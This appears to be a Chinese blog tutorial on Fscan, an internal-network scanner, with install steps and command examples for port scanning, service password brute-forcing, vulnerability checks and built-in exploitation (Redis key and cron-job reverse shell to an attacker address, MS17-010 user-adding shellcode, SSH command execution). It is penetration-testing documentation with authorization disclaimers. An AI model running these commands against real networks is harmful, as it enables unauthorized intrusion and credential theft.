Fscan:一款强大的内网综合扫描工具
在渗透测试和安全评估中,内网扫描是至关重要的环节。Fscan 是一款由国人开发的内网综合扫描工具,支持一键自动化、全方位漏洞扫描,是安全从业者必备的利器。
项目简介
Fscan 是一款开源的内网综合扫描工具,使用 Go 语言编写,具有跨平台、单文件、无依赖的特点。它集成了主机存活探测、端口扫描、服务爆破、漏洞检测、Web 指纹识别等多种功能,是 404Team 星链计划的重要项目之一。
项目地址:https://github.com/shadow1ng/fscan
官方网站:https://fscan.club/
主要功能
1. 信息搜集
- ICMP 主机存活探测:快速识别网络中的活跃主机设备
- 全面的端口扫描:系统地检测目标主机的开放端口情况
- NetBIOS 探测:获取主机名、工作组等信息
- 域控识别:自动识别域控制器
2. 服务爆破
支持多种常见服务的密码爆破:
- 远程连接:SSH、SMB、RDP、WinRM
- 数据库:MySQL、MSSQL、PostgreSQL、Oracle、MongoDB、Redis
- 中间件:Tomcat、WebLogic
- 其他:FTP、Telnet、LDAP、SMTP、POP3
3. 漏洞扫描
内置多种高危漏洞检测:
- MS17-010(永恒之蓝)
- SMBGhost(CVE-2020-0796)
- WebLogic 漏洞
- Struts2 系列漏洞
- Shiro 反序列化
- ThinkPHP RCE
- 兼容 XRay POC
4. Web 应用探测
- 网站标题获取:自动抓取网站标题信息
- Web 指纹识别:识别常见 CMS 系统与 OA 框架
- 目录扫描:探测敏感目录和文件
- POC 扫描:集成大量 Web 漏洞 POC
5. 漏洞利用
- Redis 利用:写入公钥、植入计划任务、主从复制 RCE
- SSH 远程执行:提供 SSH 命令执行功能
- MS17-010 利用:支持 ShellCode 注入,可实现添加用户等操作
安装方式
下载预编译版本
从 GitHub Releases 页面下载对应平台的二进制文件:
# Linux
wget https://github.com/shadow1ng/fscan/releases/latest/download/fscan_amd64
chmod +x fscan_amd64
# macOS
wget https://github.com/shadow1ng/fscan/releases/latest/download/fscan_darwin_amd64
chmod +x fscan_darwin_amd64
# Windows
# 下载 fscan64.exe 或 fscan32.exe
从源码编译
# 克隆仓库
git clone https://github.com/shadow1ng/fscan.git
cd fscan
# 编译
go build -ldflags="-s -w" -trimpath main.go
# 可选:使用 UPX 压缩
upx -9 fscan
Arch Linux 安装
yay -S fscan-git
# 或
paru -S fscan-git
使用方法
基础扫描
# 扫描单个 IP(默认全功能扫描)
./fscan -h 192.168.1.1
# 扫描 C 段
./fscan -h 192.168.1.0/24
# 扫描 B 段(大范围)
./fscan -h 192.168.0.0/16
# 扫描多个目标
./fscan -h 192.168.1.1,192.168.1.2,192.168.2.0/24
端口扫描
# 扫描指定端口
./fscan -h 192.168.1.0/24 -p 22,80,443,3306,6379
# 扫描端口范围
./fscan -h 192.168.1.1 -p 1-65535
# 扫描 Top 1000 端口
./fscan -h 192.168.1.0/24 -p top1000
# 只进行端口扫描,不做其他探测
./fscan -h 192.168.1.0/24 -m portscan
服务爆破
# 使用自定义用户名密码
./fscan -h 192.168.1.0/24 -user admin -pwd admin123,password,123456
# 使用字典文件
./fscan -h 192.168.1.0/24 -userf user.txt -pwdf pass.txt
# 只进行 SSH 爆破
./fscan -h 192.168.1.0/24 -m ssh
# 只进行数据库爆破
./fscan -h 192.168.1.0/24 -m mysql,mssql,redis
漏洞扫描
# MS17-010 漏洞扫描
./fscan -h 192.168.1.0/24 -m ms17010
# Web 漏洞扫描
./fscan -h 192.168.1.0/24 -m web
# 使用 XRay POC
./fscan -h 192.168.1.1 -p 80 -proxy http://127.0.0.1:8080
# POC 扫描
./fscan -h 192.168.1.1 -p 80 -pocpath ./pocs/
漏洞利用
# Redis 写公钥
./fscan -h 192.168.1.1 -rf id_rsa.pub
# Redis 写计划任务
./fscan -h 192.168.1.1 -rs 192.168.1.100:6666
# SSH 命令执行
./fscan -h 192.168.1.1 -c "whoami;id"
# MS17-010 利用(添加用户)
./fscan -h 192.168.1.1 -m ms17010 -sc add
其他功能
# NetBIOS 探测
./fscan -h 192.168.1.0/24 -m netbios
# 域控识别
./fscan -h 192.168.1.0/24 -p 139
# 存活探测(大网段)
./fscan -h 192.0.0.0/8 -m icmp
# 设置线程数
./fscan -h 192.168.1.0/24 -t 500
# 输出结果到文件
./fscan -h 192.168.1.0/24 -o result.txt
# 不进行存活探测(直接扫描)
./fscan -h 192.168.1.0/24 -np
常用参数说明
参数说明:
-h 目标地址(支持 IP、IP 段、URL)
-p 端口(默认常用端口)
-m 扫描模式(all/portscan/web/ms17010/ssh/smb/...)
-t 线程数(默认 600)
-time 超时时间(默认 3 秒)
-np 不进行存活探测
-nopoc 不进行 POC 检测
-nobr 不进行爆破
-o 输出文件
-user 用户名
-pwd 密码
-userf 用户名字典
-pwdf 密码字典
-c SSH 执行命令
-rf Redis 写公钥文件
-rs Redis 反弹 Shell 地址
-proxy HTTP 代理
-socks5 SOCKS5 代理
-pocpath POC 文件路径
扫描模式一览
模式 说明
─────────────────────────────────
all 全部扫描(默认)
portscan 仅端口扫描
icmp ICMP 存活探测
netbios NetBIOS 探测
web Web 应用扫描
ms17010 永恒之蓝漏洞
ssh SSH 服务爆破
smb SMB 服务爆破
rdp RDP 服务爆破
mysql MySQL 爆破
mssql MSSQL 爆破
postgres PostgreSQL 爆破
oracle Oracle 爆破
mongodb MongoDB 爆破
redis Redis 服务扫描
ftp FTP 服务爆破
telnet Telnet 爆破
ldap LDAP 探测
实战场景
场景一:内网快速摸排
# 快速探测内网存活主机和开放服务
./fscan -h 10.0.0.0/8 -m icmp -t 1000
# 对存活主机进行详细扫描
./fscan -h 10.10.10.0/24 -t 500 -o scan_result.txt
场景二:数据库安全检查
# 检查网络中的数据库弱口令
./fscan -h 192.168.0.0/16 -m mysql,mssql,redis,mongodb,postgres \
-pwdf common_passwords.txt -o db_scan.txt
场景三:高危漏洞排查
# 排查 MS17-010 漏洞
./fscan -h 192.168.1.0/24 -m ms17010 -np
# Web 漏洞扫描
./fscan -h 192.168.1.0/24 -p 80,443,8080,8443 -m web
输出示例
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 开始扫描 192.168.1.0/24
[*] 存活主机数量: 25
[+] 192.168.1.1:22 open
[+] 192.168.1.1:80 open
[+] 192.168.1.10:3306 open
[+] 192.168.1.10:22 open
[+] 192.168.1.20:445 open
[+] 192.168.1.20:139 open
[*] WebTitle http://192.168.1.1 [200] [Nginx] [Welcome to nginx!]
[*] WebTitle http://192.168.1.50:8080 [200] [Apache Tomcat] [Apache Tomcat/9.0.50]
[+] 192.168.1.20 MS17-010 漏洞存在!
[+] MySQL 192.168.1.10:3306 root:123456
[+] SSH 192.168.1.1:22 root:admin123
[*] 扫描完成,结果保存至 result.txt
注意事项
- 合法授权:仅在获得授权的情况下使用本工具进行安全测试
- 靶机环境:测试功能时请使用自行搭建的靶机环境
- 网络影响:大规模扫描可能影响网络性能,建议控制线程数和扫描速度
- 日志清理:扫描结果包含敏感信息,请妥善保管
- 更新维护:定期更新获取最新的 POC 和功能
相关资源
- GitHub 仓库:https://github.com/shadow1ng/fscan
- 官方网站:https://fscan.club/
- 404 星链计划:https://github.com/knownsec/404StarLink2.0-Galaxy
- 演示视频:B站 - 5大功能,一键化内网扫描神器
免责声明
本工具仅面向合法授权的企业安全建设行为。在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。
如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,作者及本站将不承担任何法律及连带责任。
总结
Fscan 是一款功能强大、使用简单的内网综合扫描工具。无论是渗透测试、安全评估还是企业内网安全检查,它都能大大提高工作效率。单文件、跨平台、功能全面的特点使其成为安全从业者的必备工具。
如果这篇文章对你有帮助,欢迎点赞收藏!🔐
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。






